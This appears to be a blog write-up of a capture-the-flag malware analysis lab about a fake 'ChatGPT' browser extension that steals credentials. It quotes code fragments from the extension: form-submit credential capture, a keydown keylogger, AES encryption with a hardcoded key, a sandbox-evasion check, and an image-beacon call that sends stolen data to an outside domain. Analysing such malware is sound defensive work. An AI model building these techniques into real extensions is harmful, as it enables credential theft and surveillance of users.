FakeGPT Lab

Press enter or click to view image in full size

Scenario

Your cybersecurity team has been alerted to suspicious activity on your organization’s network. Several employees reported unusual behavior in their browsers after installing what they believed to be a helpful browser extension named “ChatGPT”. However, strange things started happening: accounts were being compromised, and sensitive information appeared to be leaking.

Question 1

Which encoding method does the browser extension use to obscure target URLs, making them more difficult to detect during analysis?

Answer 1

First thing I will point out, most CRX viewers require .zip files. So you have to repack the files into another .zip file that isn’t password protected.

I however just opened the files up in Sublime Text and went from there.

encrypt: function(data) {
            const key = CryptoJS.enc.Utf8.parse('SuperSecretKey123');
            const iv = CryptoJS.lib.WordArray.random(16);
            const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv });
            return encrypted.toString(CryptoJS.enc.Base64);
        }

It’s pretty clear from this function within both crypto.js and app.js that it uses base64.

Question 2

Which website does the extension monitor for data theft, targeting user accounts to steal sensitive information?

Answer 2

Looking into the targets function, you can see a base64 string that, when converted, targets Facebook.

const targets = [_0xabc1('d3d3LmZhY2Vib29rLmNvbQ==')];

Question 3

Which type of HTML element is utilized by the extension to send stolen data?

Answer 3

The sendToServer function holds the answer.

function sendToServer(encryptedData) {
        var img = new Image();
        img.src = 'https://Mo.Elshaheedy.com/collect?data=' + encodeURIComponent(encryptedData);
        document.body.appendChild(img);

It uses an img file.

Question 4

What is the first specific condition in the code that triggers the extension to deactivate itself?

Answer 4

The extension attempts to look for a virtual machine when its loaded into memory by the browser. In order to evade real time analysis.

    // Check if the browser is in a virtual environment
    if (navigator.plugins.length === 0 || /HeadlessChrome/.test(navigator.userAgent)) {
        alert("Virtual environment detected. Extension will disable itself.");
        chrome.runtime.onMessage.addListener(() => { return false; });
    }

It checks for extra plugins and to see if HeadlessChrome is running, meaning Chrome without the UI which can be used by malware detection tools.

Question 5

Which event does the extension capture to track user input submitted through forms?

Answer 5

Near the top of the code, there is a function that looks for a submit button on any webpage the user uses. It then extras the username/email and password and sends it on to other functions to be exfiltrated.

document.addEventListener('submit', function(event)

Question 6

Which API or method does the extension use to capture and monitor user keystrokes?

Answer 6

Just below the above code there is the following:

document.addEventListener('keydown', function(event) {
            var key = event.key;
            exfiltrateData('keystroke', key);

It uses ‘keydown’ to capture keystrokes.

Question 7

What is the domain where the extension transmits the exfiltrated data?

Answer 7

Within the sendToServer function, after the new image has been created. There is a URL that the data is sent to.

img.src = 'https://Mo.Elshaheedy.com/collect?data=' + encodeURIComponent(encryptedData);

Question 8

Which function in the code is used to exfiltrate user credentials, including the username and password?

Answer 8

A pretty obvious one here, the functions are aptly named.

exfiltrateCredentials(username, password);

Question 9

Which encryption algorithm is applied to secure the data before sending?

Answer 9

The answer is within the encryptPayload function. It uses AES.

const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv });

Question 10

What does the extension access to store or manipulate session-related data and authentication information?

Answer 10

Session related data is referencing cookies. Which the extension has permissions for thanks to manifest.json.

  "permissions": [
    "tabs",
    "http://*/*",
    "https://*/*",
    "storage",
    "webRequest",
    "webRequestBlocking",
    "cookies"
  ],

A rather easy yet fun lab. Information stealers are quite interesting, especially with how common they have become. This new within browser threat that steals crypto is rather dangerous.